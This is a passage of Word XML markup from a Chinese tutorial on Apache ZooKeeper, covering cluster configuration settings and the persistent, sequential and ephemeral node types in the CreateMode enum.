        </w:rPr>
        <w:t>follower</w:t>
      </w:r>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>服务器与</w:t>
      </w:r>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>服务器之间</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA20CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>请求和应答之间</w:t>
      </w:r>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>能容忍的最多心跳数（</w:t>
      </w:r>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>tickTime</w:t>
      </w:r>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>的数量）</w:t>
      </w:r>
      <w:r w:rsidR="00395187">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B301A7" w:rsidRPr="004441D6" w:rsidRDefault="00B301A7" w:rsidP="007541C0">
      <w:pPr>
        <w:ind w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD2A31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>dataLogDir</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD2A31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>：日志文件目录</w:t>
      </w:r>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Zookeeper</w:t>
      </w:r>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>保存日志文件的目录</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F64B2F" w:rsidRPr="004441D6" w:rsidRDefault="00F64B2F" w:rsidP="007541C0">
      <w:pPr>
        <w:ind w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD2A31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>服务器名称与地址：集群信息（服务器编号，服务器地址，</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD2A31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>LF</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD2A31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>通信端口，选举端口）</w:t>
      </w:r>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>这个配置项的书写格式比较特殊，规则如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E97DF2" w:rsidRPr="004441D6" w:rsidRDefault="00E97DF2" w:rsidP="007541C0">
      <w:pPr>
        <w:ind w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004441D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>server.N=YYY:A:B </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00167AFF" w:rsidRPr="00F41A4C" w:rsidRDefault="00167AFF" w:rsidP="00167AFF">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>zk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>节点</w:t>
      </w:r>
      <w:r w:rsidR="00A2210D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>永久和临时</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>public</w:t>
      </w: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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>enum</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> CreateMode {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>     </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>/**</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>     * </w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>持久节点：节点创建后，会一直存在，不会因客户端会话失效而删除；</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>     */</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>    PERSISTENT (</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>0</w:t>
      </w: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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>false</w:t>
      </w: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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>),  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>/**</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>    * </w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>持久顺序节点：基本特性与持久节点一致，创建节点的过程中，</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>zookeeper</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>会在其名字后自动追加一个单调增长的数字后缀，作为新的节点名；</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>    */</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>    PERSISTENT_SEQUENTIAL (</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>2</w:t>
      </w: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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>false</w:t>
      </w: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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>),  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>/**</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>     *  </w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>临时节点：客户端会话失效或连接关闭后，该节点会被自动删除，且不能再临时节点下面创建子节点，否则报如下错：</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>org.apache.zookeeper.KeeperException$NoChildrenForEphemeralsException</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>     */</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>    EPHEMERAL (</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>1</w:t>
      </w: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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>true</w:t>
      </w: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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>),  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>/**</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>     * </w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>临时顺序节点：基本特性与临时节点一致，创建节点的过程中，</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>zookeeper</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>会在其名字后自动追加一个单调增长的数字后缀，作为新的节点名；</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007333F0" w:rsidRPr="007333F0" w:rsidRDefault="007333F0" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>     */</w:t>
      </w:r>
      <w:r w:rsidRPr="007333F0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
